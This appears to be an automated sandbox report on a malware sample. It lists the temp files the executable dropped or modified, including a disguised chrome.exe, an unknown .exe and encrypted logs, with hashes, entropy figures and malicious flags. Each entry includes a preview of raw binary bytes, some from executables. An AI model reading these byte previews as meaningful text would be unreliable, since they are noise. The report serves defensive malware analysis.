                  Preview:..T.iY0..L..*B...5..YB.`..d.J..E..F....O\.e,FK.m.....F.]_....xs.n..>....\.-!F..w1u...$...m.=.!.Bm..h..}....;.#W7i..er=/ .#.."...r.'. {9..e......K:H.#P.Ji.E.R.k....../....6.O.5A..>m..[....}F...6n.)7.{.....VL.M.t...T....L..t..(.k@...\.n..p\..#...1...f.B...$..J..A|.YY../=.uR.{.|.r.C..3l....F.....O^Co!v..(.Y.............Eb.P....s.:.....;m....'"....hO..{d.8....~.5._.$9.pW$..AQK...]=x.^(.H.C........K..df!..NuU.O#...#U...m.`........3.%..aZ]./3.rZ....kD.....Q..sl....p.:.Z< .-.!..v..........\....|k..N..&...z.V..hb)...>....W4.M.&'..xJ.."...#.s.....!U..No._..1.,5...c..4...wJ].7..#..O.l%.Do<......a.O...H.{...|"M..F..Ow.5.r.!k._...@f..............g8a,.0{.w.1.T..Ex.A..+.x..D...<6>...x.Bqit.....1r*.htB2*.Q.k...-~...D..._?8.%nX.c.h...l].....|.w...:.8}.r.Y(....\. .>.3.Ro.AW..[{....W.C3..z.tLQj.hl...g.a.<,..d`|....R..>...s.z[..p.@.L..h..s.(....)..$-.B/+.......U}..P.........E.....@#h.v..j.x.g....$..M.n.'..T..|#e.8...mb.f....@tV.rh...a6.`E2.^..;...~

                  C:\Users\user\AppData\Local\Temp\user-PC-20231005-0843a.log

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):174316
                  Entropy (8bit):7.819470918597298
                  Encrypted:false
                  SSDEEP:3072:sDZXLy40PzQCSw1gZSfEUzhSB/k/+ubt5jhAnEqy0n7piHP7Gsh:+ZXLj0rv1gZnU1SNubt5jKFy+oHaI
                  MD5:ABE8529113B4C725239B7DA53D7BB3BF
                  SHA1:9E0A7C64992261CC424156424A67DEA856DE883A
                  SHA-256:072DCFE5C1070195855741B4BF6BF5921CE561A6B68CC5442D0A36D06BF7D52F
                  SHA-512:DCF2B1FC1416A758C4D4CE75321C3299D6F829C722ACD0B507B5BE90CE15C73CA5B46F76E7690330A75C856CC8B868B94D9FA556DDCB30172AA9610D6CB0B8A4
                  Malicious:false
                  Preview:..T.i.......O..7..G..6)^........}(N..('.1..."N...<.Lk/y......-1e.yAK.tq)....>...5.......{1....7...kA...7s..O..nt5..'a.f..Y......-..D.+.f.=....auq.......n.A.j]...JV..t........c<......9...x.=c.6N..)H..<......K*1...X..v3D|.RG.....@z@...U.^....+.*..e.......n..$.. .b.ar.U.0.i..d.f.....[....\e....L.....h....?H=1E..0............q....~..G&8.).{.|1..-.&.....Ed1....#-.S4.....l.x?..}8d.{68..P...<{3.......1.KGE.dBo.E....wSm$.=..l.I.V...{../6^...an..n.#{.WL~.....g........TY...A|..c....|lfT?=....w.X....G....a..H/...d3~._.f...^..F.9....(..P.Up5..bL..3.&..]..-..~H..m......sP(.5P+4..t.O.ghW[ .2.~..oD.xy6x.~..:.v9.."..9..w...'...E..W..2....C.C..@.l.(..v.......Y7q.s.%......c..j....+..1...n...\......$.U.Rom.......1mvw....1k....w....4.f..a.......4.*.N..X...yk...25<...C.6..d.......G.?..2..XT[..Cn..fO..O.2@.Y......&*....|..3q.).:.Y..['......h.....}...M..2..@.).g......C.f.o....1=.E....(L.|.f...5.....n^c.uI.?.}...2dzm....'.....n.75W.d.../.

                  C:\Users\user\AppData\Local\Temp\user-PC-20231005-0843b.log

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):262428
                  Entropy (8bit):6.908743792636278
                  Encrypted:false
                  SSDEEP:6144:d3SsstVWVB6y5cC8tuqk3wNwVV0E616V5qOf4liqFyBCdMHO+LJiQFNdayNU495e:d3bszWz6y5cZEwwnb5qOf4liqFyBCdMa
                  MD5:03928884EDE365A80A4C66324147136A
                  SHA1:DC9EC737A3993FBD57E32B19AC82CD8A3A9C5EB4
                  SHA-256:39BD0FAE7D54260380E49127144BD0817AB01924C4B1641A6F18556BB16D80C8
                  SHA-512:31E6495329DEA10DC748B93AEB2CED18A4233B260964A77E678622D21067A3633933C5373506B641004DC279AC337D88C7A5C9FEBD3A4825BCE17682D9B4F80C
                  Malicious:false
                  Preview:..T.i...J..X.B.2..6.I.o$;9..j.Y9.d.%.7..SS..+...G.;.;.N.~K.M.7....d..1.).5..{.f..<.<.6...7|..h.x.F.3W.r...{...}.%..P._.5,.....e..f&TZ..2.rk.d22.......r..!....>v../.{...yv...pi.Cu<.3...}.|A...\K.B]....U..Wi_*...k8t.L.!C......9)c.".........Ai./^.4%..q.O..r.I.H:.{S...@'K......Wvo?.U.....B....a.M..O7.F>.2..}..=Nz.....:+].R..+.......p...K#..\s..N.Y...N..Sh....e...u....6.1.t..y..t...;-.3FH.Nw'..a..0-'.....w..;..........2..o....J.....(/..*.)C..Y.t"l..X..wn..+...Y....$.v\.c.s.:A.t..Q.u.).`..G4.....U........1R..im.t6....V...]..suE..Q.......(E.[C..4..+QG.;.[....y.d&t....z..2b.H..T..<.!^.ab...=......Q..Z.T..$."G*..~....O.m...u]3.". ..q..,_......@...g().....Ib@...WG.Q.~.e..f%.xR.d..<,.x..@........d....-.k.2rh4.F.7.A.|.)xYO......"<n.>d ...F.pa...7..].........p..~(..@....a.S....Tu...K.....;'~$._B<z.j.e(.:....w....}"/..A.....o..c..^P.g ......L.X.P...`D......d...Y.v....c..XM.E=1........T>'...O{z.)..#...............9.].n..j....A.1.d.w..M.Z..V.|.....f..-.J;.l`

                  C:\Users\user\AppData\Local\Temp\user-PC-20231005-0844.log

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):97474
                  Entropy (8bit):7.998085964541585
                  Encrypted:true
                  SSDEEP:1536:lFrG+YFiZVkDjwFk14MfIJnbe1GjR9xLlYRQyFKZz5heeNR9x+COGzsxfNFHA8mG:lFC+YF80ki14MfNUt9LyFKZdiCfkfNe2
                  MD5:625EAABB9A0FD6016D8C361E1BE70C2C
                  SHA1:14242F77CAA06E35A6ABD85B25F899BB79E519AC
                  SHA-256:E98DAFA1CBF6F0F9C65B981F0FB9F113BA4DC3D0DEA8535D72C3241691454577
                  SHA-512:40E875B62C2F987194F95845FBAA8C0BF1260A829A2BB6553E3629421CA763D5501C2C86E85F26B2AEB66ACE7C25BAE570E0195F9390FF7DE2E7A0C7848D6E8F
                  Malicious:true
                  Preview:..T.i.6.-1.F0z3.s..._gU..*...[+H..0.:....zI..9..,.~a....,.7.T./KT..~....^.4G8........WV...}d..%~.M.!>1ABz..s..j....W+.]l......~B0w...7...v..T/....i.t.%....r.H.a.J...A....../.........h.E....QV.....q...;.....rCV....W..@- .........DO../\i.]...r:.rExgrr..Ro.&.L.......U.....8..6L..'.1.,..&....>.*..e..,......0..,..C..'v.M....CWz.......}o.(..dj.....h..T.....ou.......8.,.eD:9Dmp.-..",..........i}.o[..(lo.....L....SD.....q..fp\......k"1k.A...._N.3...V.HR4....^>..../.N.j..f7.k...L..8T,f.v.b........#.<.=Yh+......|.[g.+T..Y@.[....T..f.k.&Zs....Gs..E.Z<".Y..A~Z..6.....9.^..5.L..K.g.J....*;..c............vs.tE.b...H}.._.#N.mP.lF..",...L..C.Bu^..7..O3Aqi.jU.@...<t.y.5.d......._...Y...}&9b.v.V..5n7X|.....Wb..h+..x.0W.C.tt...GP.7..!gN....=.hx.E...p...(!.@h.s...7..g"hg.oQ'..x.8.`...,.AM..x....!.`....@........H\.` ._.[...*...z.l...%d...w..........m.B}...)... ...#]pS.?a.. ...7..{.].W.@c.g.v.Mt..)zc...Uv....o;.`..o.........B..}...s..2..x.k..k..0>E.a.. TF

                  C:\Users\user\AppData\Local\Temp\user-PC-20231005-0847.log

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):395008
                  Entropy (8bit):6.1108236702753835
                  Encrypted:false
                  SSDEEP:6144:PoyfI3e5fFlJBdJLaUopdFXLMAMKO4gUHOJRFpgroQ3t:PrISNTLJWTPMICgr/3t
                  MD5:8360737711241E3E64FEBD4F283F41D1
                  SHA1:2313F20A053103695B507094775B403B33B5AF22
                  SHA-256:B2BDBAE86EB98029195EC7C0E7F55F04CA265F1D314ECE195D14FA64D2307876
                  SHA-512:0EE0F1F81A1D0F982729D04568698D1BC3FCDB49B58D3F049A66950A89065AA12764FF86C275B3075AF0B57264CA0D2FA2D46E3189314A170246716F5AA1B8E2
                  Malicious:false
                  Preview:..T.i...+..cu.c.8.3....u..M1..QE.....:r.9.:VX..[........a.J..a.....v...9i...`.A..dpB&YC.7.....G.i6`lRZ...u}..Z-.-E.d<m......S..`.......h....e.U.....z.a.V.!.o..h..F.m.....q....sn.....DwU.@.+oM.^...=.......2P..$.U.!...J}I1l.)d..ms........~.E]..G.o].c!....&.dx.....'.. .c/.......M...F.........&.....aW{.x...A.<.$....t....s.T.V...........b.5......z......I....#...KTj].c.r"........8.nh/#$lpv..:*.c..7...... ...........G.*..y(j.B...C.oSz.5.8.PPU...'.[..0.n..:)#M..bSQ..7Ah.NL.t.I...c.(.9.W.&....b.DJp..z_...h^.9.. ..}...er|B...#...90..L.C..L..F{..R.1Bx$.q..6^...|.j.4.*OO.m.!GA.../..[......s>DG..Z.........x..{d.,b.......TL...w(/.W>.~}*.f....^....l!....$.r<.0R....P.b.....[.....T.......wX1...C.C.._Zw.F.=9U.6..u6j...^..."a...+...7...-..9.p..:.q#............4.;^g*.N...N..DC...g....o\9y..s)).+r.-....m..n{kp.....fD......3V.9...,..K.UqI..0u.|..~...%.K.E...?..w...x}R.H..f.q...l.B.....T...L.S..y...X_NlD.........l..Q........].8....<.....!..F.Q....W......

                  C:\Users\user\AppData\Local\Temp\HhVfIB.exe

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS-DOS executable
                  Category:modified
                  Size (bytes):16206
                  Entropy (8bit):7.987822238566923
                  Encrypted:false
                  SSDEEP:384:S0kiOryKSzktmbRlD0quPFa7f3biA7BKaf64d4EfuzO:SnmkMDDTuPFaz3biA7BKUDfu6
                  MD5:3A52689EFF3A95DBC48CC3D748394FCA
                  SHA1:15B6ED8B7B9E6AC5504D5EDB7D4DB789FEDB2618
                  SHA-256:E1CBE9F7A8CE7B63CBE066C793396BC7984D9B19630FF562A967D06C8D4C8272
                  SHA-512:8530EA155541C4FA559DD8FAFDAF4C63EDC38BFDE7E3AFE63A45A255806D0B1C32C5B95D33AB7CB4AAD18724D218D580A917D047474D9BCB21D3A7528340AE83
                  Malicious:true
                  Preview:MZ...X8G.+.n .L.2.[...}.W7&..s:-.'...Q(\.w;..p.......})..g.........>.G2.O*73....")}TA........Y(U.d(..2T.../...m>.B..$..5.Z3.H<..2.h.s.cT.V94.3).J$..+.!...........;xg...o...[.u..z.YA..X..........R^....-.d...7..>.$rU0.q)%y.W0ZcS.Sd]......cC1.#....!8.5Q.Zm..s2ms.F[.....si..{..wH..~Cf..z.R.b.Y.....D.C...-...G.....C...G...}......F*.......^q7".U...CT?.....=Du.*1...d.1..m?...@?..VJGz.Y..n...3x.....~P....D/b..h..5hH.....}<....y."z.a..6..L.... ...?Kf!...v..k...1.=U.X[..3.6T..7...^.m.B.-G#..b.z.VJ.........h..t.I/...c.Z@.....o..gt<6.nN!.....{......M.......h...Fz.HY..kr...BQ}......P1.xG.O.|..s...Ip.T...7..[.........0.W.-7.As.=e..$,.cN.h..\...D...!.hh..[/]wo..fW..'..N.KG.._.j.vA<..)....L.n....W.. ..S..X...!...-..|^.j.gw.........qX.@.-...\&.A.{.[~....u.R.....xT.t....E.CzEY..%.#^..gQ...c..y-a........} .t|g....3.QCJ........c#Gv.....]s..Q.....|.w...bg.b}..f..:.&.e...p..)..R,.x...yx..s=.I.9..vQ..aT.T...s.K.2..}...$.Cl.Z..@:H....([!ok.. ..[.8..pM.?.BHR...<..T.

                  C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):30179
                  Entropy (8bit):7.994674205214123
                  Encrypted:true
                  SSDEEP:768:XwUsl2umdUPWg53aHjaFYFoovNbs9VyBBmg5p6NyU:XwUO2umNg53wnbxEQTN60U
                  MD5:B260EE280EF443C118E2579566C8A003
                  SHA1:AA4DA5C8CCDF3BCEFB326F4F1B8AAABAC2AF44FB
                  SHA-256:EE345F83B028F55798FB41A6378EC19C2C62452945284A05906FD81E6AA58214
                  SHA-512:A997B99CD8E29FD3BE3C5B19D12C0DB384AF5920884AA7084361BDF8585CB2070FBA27F2833BAA06FB8924431E70DFB70038E3CB440C7825290ED09CDD440892
                  Malicious:true
                  Preview:05-10`E...W... ..L.4,L..h...g.z.}.l..Y.....T...-...-b...Fv..b...S.........*7........:.B.<.VY...y..+.I.....cRT..m..w.}...@....m.S<.n......X^....?.~....s..P.)`4..j..N ...;.}.....u_<..++1.Wd@..q..i..L~G.6DC..*`...J..b.l.E94....w....?%..........-......t..O.....^Q...7..@IM.o.h.T....<.t.jMKS.-".=.....lHyj4}......m...x.......Ei..A..2.L.I...~3....'C..Z.........5|Y~-....4...F.8B&.a.....%...#..4Hn.39.....[...v)q.....?.K.`j@....y8..&.t..g........B=.....S..aL..t...H d*.>..K...'+!.....M......L....tJh.....u.Vf.2*..+o.7..Lr....2..Y...;..J..#.'.3^K.".~......%...l#-..{P.]&.J".v....j...c*....J.^...o..j`..QFs..i.),5.......w..{........2....8.3..T.XKB...c..e|.....J%#.v.....^N.XK.%......Ae...sM....{...=..t....L.....923O@.>O.....5..Cy.=.f...H."L...........l`....c5M.A..C..g..w.F^9j6]c....b..........F...Q....f..M.|.k..-.R.......Q...n..M..|.?o....<..\.]..<7^?..IJ]rP|..x.:Y.(&.......jlz....i*R.4B0.....lJ. ,l.h.j$.....].......|..:,.........p...;..;.U..<

                  C:\Users\user\AppData\Local\Temp\chrome.exe

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS-DOS executable
                  Category:dropped
                  Size (bytes):141134
                  Entropy (8bit):7.998744832920713
                  Encrypted:true
                  SSDEEP:3072:L8PlkOAGqRKnSgvVn5XAGb9YR6YTvHK3B9E6gj1H0k4dBd2YN099pX:LElIG1SgvVdAy91YjKjfgj1H0kUBul
                  MD5:7D7DF6205EA78593A48EF7985F9EA0BF
                  SHA1:9A73CC1F65B13722A176960B2275537ABCB30D6D
                  SHA-256:30E944184271F1A91F7560BC762AF56AFCD78900B8671F591C49C6322F60426B
                  SHA-512:88F4034781EF72C848D12C09617B70139C735E68D29509D4A32CA40E3DF5C883A1BBB222C9D1822DD2B9BB1204A0E62E986E46FCA6E25786483C0D57606FECE6
                  Malicious:true
                  Preview:MZ....@.#.5...).l..D......9....U.JV...5.>U.3......W.^.l.x.s.u......Z.?q..."..TM.X..]..).ky......`.W..k......O.g....J(.hM8{'...G.......M....y.%....:=B.......o.<.o...t.k.I....fI...z.s$.x....A}Y..Gi.|.I):.%QJ....5>Cm...|M..hAa...xo.^....M..pa...v...._A.....<....f.jS/Z+'Zm......5.e,.b^..x......&..G..0.....^.....jp.0G.c.x..`.>.qc{\p.i*C...>...N.my..F..r&...G|...5B7.......:..8.!Fe...\.........X......HZ.[I?....n.c..,....q{<.=.1eK$..8G..c..5...e......H.....f_e-. .....5..`.(...........>..u]...y......K..........T..;....}....=....|.Yvbi......I_..(....7P.?p........j...!.....t.H...0.5..".3..C[........)..(......`.I.iZ.5..4.=.6...u..>...l...g!cN.~.D......NH...4.....`.dO.x.{..t.L.p......p.....x.^.(.p...G........0>....=...a...C.B.+j....eY.N..\.1.C..3!al....>.......n.]. @..WO....m.>(...w..:..h......mC....:e........I..=..f..rd...I....z.G..I.Y....Y..p~.{..".jKK.(G..H".1...h.!.g.B...h...9U...._...z[.[.^V.[......S.. j....at.q...D..u.8..c{.....

                  C:\Users\user\AppData\Local\Temp\chrome_installer.log

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):3279
                  Entropy (8bit):7.941829039457203
                  Encrypted:false
                  SSDEEP:96:wJ+G9yiYsBfWva9C57V1SJuQ2DmtGgso9tLo0:woYyA0fwuQ2DiGg79tLo0
                  MD5:19A7C55B089C3741293A8AA36F426594
                  SHA1:6146A62DC858EEF0AA20BBFBC46561CEBC042F0B
                  SHA-256:B61D90C1AC651BE8C86B9CAD9A601576196AB962C2933A11C7172A241EBD4EB9
                  SHA-512:60C065E1D7F8754255B639E7021FCBC3A2CD85E525DF5CB6286826E44E9CC108A6DCB2259743DB2010DA020B3DB7D88D038DEBBEAFCBC6DDBB083E8392014664
                  Malicious:false
                  Preview:[1005...h...A......V..a...<rM..1.....g.Nx.?....Ra...)....... ..B..D...../.&.?.......;...Q_0_..5...*x....2...U./Z...y....D....T..Z..P..NJ..hmG..*4..,7..zO0'`..5;)As.......o7....n.y........=6.R.K...1...n..e.U.4...7.T.$...|.2Q..G...5r.2}..3i..^[....s..W)..-|..Ka.E..\....QH..F.m...z.Xv...n...~ l...R....m...|Z1.o.....3).'. :&.. ...I.....i$]4>......l......*Fx...mh.....a..G7jDwU%.....A=d.b.;........?../...5....,.%.X(. ...u.!..........30......h.*>..|...kf.bc....{..^..Z.................>.....E....~C...l]..(.......m..G..4..eP...$.m......r. Ga./5..BEuZJp.....E.Jr.-.v..}.S[.._....Y.u...I..A..0v..;......m.'.9....S.p..`.<.}...|&.D..N...k}......+.....5.."'...q....v......L....HQczW..y.%gG.M.N&A'...?C.>..;7....w.......'.....6.Q..oW..u>..9.p....d.3..R4....g&^$.sD..W.....@2.RB...?.6Lv. .v...s2..`xD....P..z.my(]0.K..,....V..d\...-.mrS]|../Y....-....[h......=....5P..j.d..J...lH..H..p.D..'...b.._.bL.....R8..T.o....%C..".......[...b........+...l. ..c.....N.B.s.I(.~

                  C:\Users\user\AppData\Local\Temp\cv_debug.log

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1401
                  Entropy (8bit):7.85893484251406
                  Encrypted:false
                  SSDEEP:24:YUQGDRCsQutAa6ha6GtXP/YnoQH/DTEhnPb4JBm09EwPKeaQdr1avukYCr5x3zbD:YUl9deDGtSH06BAwhdrsd3nD
                  MD5:7AD3B412581277397FDF375F181E54C3
                  SHA1:0984139320906F8D2DE695BB37FD7B8398F9C1A3
                  SHA-256:61985020D5F77D4289E08D6DFAC2497F95A23A05D4BE5B0C70D4CDD8F3AA69A5
                  SHA-512:F847267AADC7EA8FEC3B500DF281AF490095A1858FBDEF1330B6E6A7270EA9DB8D09CCDD3629E5A07EF3E15F861FCAE5EE1B7BD4ECAB5DF4D730D0D7C9FF35A1
                  Malicious:false
                  Preview:{"loga.......s~.........l....M'.EXwH.......d.i.......F...9.G. ..Y..J-:.3gG.(..I...i........b5ej"....$.5..)5..&...W6....1.a.....J...5W...}...{{.\)f...!...p&W..J.ao...R6q.LI........%...W.\...~....?Cp.K.M8.z... ..i.6..IP...GN..N.d....}...b.NqFL.$..O.:....$;....o..w..d:...<.@..M<+.......6._.E.k.=....&k;.N...`.....'..|..1......Bn{..c_a..o.h.........M...%?]..CY...OQ.......G@[b.y.(..V_..7......B.K.....=..)...\g.X.K?.....w..........$.=-.}...5.HFf...1|..D.qO.gQ..iT..w)...|10......E.V...K....fS..b....b...0p........c..:[Z..mA..j..=.z[_..p.UV.1.dc.D..1.9...B.PJ..n.<..E...g.Ik..*)..=EQ..Q.^.....R.y.=....X..l\.B.|}.@......OiV.Fi...*..^....#......i.X.B.U.....Z.E._...E.......%.Y.l.....B.z......O(.FA...0....]..Q...%,G`?..,...46.....X..-.g....+...8...$..s....x./.w.T..C..-.3..4...*.UvN..\1.*lM....<JM.Kd.J.\i}>..J>T5.....W..u._.p...[......U.PF..........}"T...Q.UMk.{...4.1j/.u.8.;..U..DW.>R...`}.V.2......y.Y.......)iOmM.9..<v.c.u;....|;.....n...

                  C:\Users\user\AppData\Local\Temp\f92dd30f-d70e-4c79-98e6-b827a8bb342f.tmp

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:Google Chrome extension, version 2141251075
                  Category:dropped
                  Size (bytes):248865
                  Entropy (8bit):7.985647821691098
                  Encrypted:false
                  SSDEEP:3072:ppSHqvgQbPhhMc6ongcyqGJwcpiak8uOBPvoflZauSpPcRABUGDcaKklrYsSKI4M:pIKvg0GSgcYqcpi9QB6saaBVcaxlnfM
                  MD5:132547B1E7FEB21F37FAD52AA3346A1A
                  SHA1:53FD0AD1C2E726AF7614AC8227322FE310626255
                  SHA-256:783E1E99480B4D9D5AF2A3E2F98C7EE9FE4A2A080FE5D84D4BF0E1FC3B136BBF
                  SHA-512:06F4509885109B0DA97BD9C7B5F72292EE4FC7702F94AA54E84DE875AFD307BFA666F729305DC4D3B4E81F40CD3409696CC6A3EBA280A631B00C159A007BB2D7
                  Malicious:false
                  Preview:Cr24........-...Q.~...ii.....l........MTt..AF....2.}.-........R.....aj............:.%R.#.e.../.^..N......S.!.....ikWWg4.S....:.W)0..+...@ \..hM.in... .L............T............R_.2...Xu.z_^....[.....6...k..}\...Br......}....C.......h......o...h.,.<.l.AFG...!.1V.{^T....7PJ..(.*......!M.W..R.+(...<......5..?t.vN..3.E4?....(m/...t..g.KA.P ......R.....}hC.....laz7?.!o.Clw. ....gGb...A8.I........%)..C......}>....G"...5.*sh...v...^....y...tn7......$G..9VB.u.Mnf.K..7_4..2Y.Z*.4...~.c.!.=.v...T.-.....[.....a.>.7@.*..qBN...B.A.-{.B }... .b~...-.U..h.G.eK....g.C...j.^L O..N..w...;.s...0.|f.5..Zc...`|5...q..A..lpR.~.*.*..u....J.+J2|..".*S.\...u..9.`..V.....{..PN\YB...w.S....-Z.d..#._....|.M.r...C.C...+../..9...`......./.....\...0....n......F..n.n..|*..B...o.n.Q)H..gb......E?..*.&;..#.?.}V..E....].....3"...MM!vZ(.U...... .$..g.......F..v....kn....W...S.R.Gu?e'.).j.?....i..p..w.y.y.9...?....}.....b....}7?...k@...td.3...j..Ngb...L.7.<RJ8..

                  C:\Users\user\AppData\Local\Temp\jusched.log

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1063
                  Entropy (8bit):7.7963895655650886
                  Encrypted:false
                  SSDEEP:24:o0yn8q2B+hyiBfT4wmtQ418cw/c2R4hyQgf5JHY3zbD:o0y8/o0iRX4eVwhq/Y3nD
                  MD5:60A294AD64523197FB74B9675CBA04A9
                  SHA1:1555B0B94F85693F932156EAD210502120D4054F
                  SHA-256:8ED7DD9D328E84BB99483D2B7083D76E9E307AC5D0C46E39ACAA63B0ACBD8E60
                  SHA-512:63AE64CAAA6830C5E95BE2F1D7AFEC4CD30B3C1FE3B39DB03192189D20F4966B8373437373BD52B4630A3A5E436BB267F0BE5D44954F57117BC37119EF5630E4
                  Malicious:false
                  Preview:[2023j[..h._P..K.........=..L..4..Yb6R.....{.5x.J*...x....^j^.,.L.e..*.......g|...g...W...~.@(x...g@..~...Y...Tp.em.2......[:.......(...G.-@.-.....x..).l......jb...U.(...d.I.$.0....[.....18J.p..L.%.5.nXPA..x_`[............t..k.....;tm.b.)...^.,.....HB....<f.Mb..M..7.:.xZ..d..(...,....P.k<....D^fC..O...$.C1..d_f...5.g..1.a.\."x...t..."&:^E..z..Tp.<.@.....q.7...T..@a} .......u;.......$..'.v..K...~...s...r4..O..4..$.d_!.........I..'.......%.p........le....... .e..Rr.!.. .Cz....K.....Vm.... .C..j..W7..<l.M.I..........1..<........J.A...n.J/.....:...[.6...M.W.=....,..9..V.P'.>.....w.,..*...x...."Pe...*`.t.L.9...._.:a.Cu......3...a..qj.@.......E..V.i.H.8T_&G..H...m...0)......Cy.#.:uAO.~..^~.s.m...+....6.I;.d.V_5....(&.o.%;.9U.Ml...*..F/.../qoY\$.v....T..hG..u...\..$.....$X....b....q.h..$.GIW.....V.....;...pC.j...........y...d5.0...~1t..iL.a.v.|z}....[....&..j......P.<}3.Tb...:.D'g.O....S._@I.....I.d!f..d...[..\..X{i0fXrUHVihm5xsI

                  C:\Users\user\AppData\Local\Temp\msedge_installer.log

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):12309
                  Entropy (8bit):7.988771211891896
                  Encrypted:false
                  SSDEEP:192:bX8JzWcmQ7qA4wakSoa/MU5kHY/y3L32tN88X7e5mDP27Q/GavO:bMJq2qPwHgOHYq3CH88Ln0Qs
                  MD5:7928E3857A87E04B216C2997E612C7CC
                  SHA1:3E814EFAA76754A8A89E6C5E947587A730C56266
                  SHA-256:7A6FEBC043490BDDD4E5324DBC1C2EB5084CB3155ACD1A26144BE0F26FE3AE27
                  SHA-512:2D7249300409A286D0DFF76844A00D7C7217975A4C2D2EB8793AB8542C1E0F8FE2B62E08AF18E930428DAB84FF5E15C60941417BB4CF735E5A3B010BC1056CEF
                  Malicious:false
                  Preview:[6708h....J.Q....E6.e....I....>........+Z.p...+....U+.........F?.......|.7._......K..D.F6X..........=g.....0y...:.n.(...c......S........h..Q..<.c._O..Au3ik.!X...........-....H.0..`.*=.s......>.En.m<8..Y...N.8Z..rq.r.....D......E......o0)....py6...3Gg...P.ef.......p...ll... ..6..sCT..|..E.N.0xx.....:rNN.2...:\}.......v...O.#......5.9C.. H.e4m4....q$..LP....NZ.<]t...I..no}v(c.E......5qC.....%..h.....GR.]..OC?VG.qo..A..Z.p.....]L,.....qr..U.H.J}.qS.....QM..$..".......#....... ...X..9]WZ^r.).....e7R....m.!i..?aqOG........>o... z.).|.~.b..$...@.%..z.]...l.<...i...CP.[.rn;..sddz....N.1.1.c...p......-MM..p?W.b..dL.5.[..P....l.X.?....2...?..GiSf.......V.J..-..V4.*YD..[.G8......E.p..<.t..6..R.g.y.Ry4 .J..6..'.\.c..][.a....G..7.\..c.,4.x..'...^~..+,.7.prA..!7".o[x}=.Z.v..p.=._.H.,.E...0N=Dv.[.|.,.r....eO...;.l]...I3.[@IQ)......dt<.6.5..gb~...Ps...W.d..!3.E[y.\O ..$C...c.M......bi.~j.1!o...<....M.XI...q.]P2.<.rHD.n..8S/A.@.f....0...$7...!.#.?B...

                  C:\Users\user\AppData\Local\Temp\offline.session64

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):66542
                  Entropy (8bit):7.997331081124097
                  Encrypted:true
                  SSDEEP:768:RiCyU3Em6Y7/HLNLgpDPlqQ7nRcNjCUYmDDFHh13JppFyRSVNerUrjbV8cpuBXru:ECyUMZP9cNj5Y2pHnpFsSVNbrvwzqq+
                  MD5:5423B708CE256CB70072D33310EF04B9
                  SHA1:5020779C818A5B091E306704C12FEBB29C6FFE72
                  SHA-256:851BE28A624D215D5BB273ACA9871B56B69AD3D1E8C7EF40877AE8CE40E80622
                  SHA-512:4AB84A3825DA43658C712315EE9D27590716F5901A50F960C15F7216C4142C8DC834BCBD5476549DDF80010AE16B78E353D11619EEB2C7E158DAED6532121CAC
                  Malicious:true
                  Preview:1G.f.Ws.3R7........F.(.!t.G.8..&....T.}..8.zg... &..1...S.......qw..`.. .~....1)N..D..q.\Zq%|Sw}..Y......`Z..,uV...6.=mCf..........C..K......]..!.r.E>7....sl...B.=.C.&...9......N,q.wL.cZ+.t^.K-..d.\h .a...4..}kR....*X.Z....{..yH7e...X..T.........I .L.u.........w..Rs....y..}..Y..w..=...m.&.}.IZO..r....Z...*...r...i..|.H<,..S.1.@.'.$L.D..uQX............'.s.&.n.1..+!.H..]...{...j....:..r.j..q....7.Z..%>........V.. 2.G.?>........"1....3...>.......m..\..nIu...._{....Y._..E..U..yi.4.............I.G../.....7W...a.<V`....P..s...|W..}.......1.Pn.r...-.P.............Y*.......v....r..Z.bw.h.."....I.6...[??..w....I>7~.....+NE..K.@.y.;VP...sy_.[Wp...9..^.\|.p/..eL1.<..s.....>....d..&e....i#s>.n.I...,.-uhO..._|ju..s..J..IL....\...P.....?2}..ru5".1x.u...~.....H..{.e.:}.O..G;w.........*..1..K(A.r.......Kf....A.A...CN.@.....'.Q^,I....A...)._".ITw.{..].>.....^57.....vK.C.:..kT!.3&.....W..ak#...+........<...".y_..c.e........#.Ar..B.Dk..~.....q..&/.1..>....

                  C:\Users\user\AppData\Local\Temp\prep_Form_JSI_API_not_a_real_file_V8_perf.cache

                  Download File
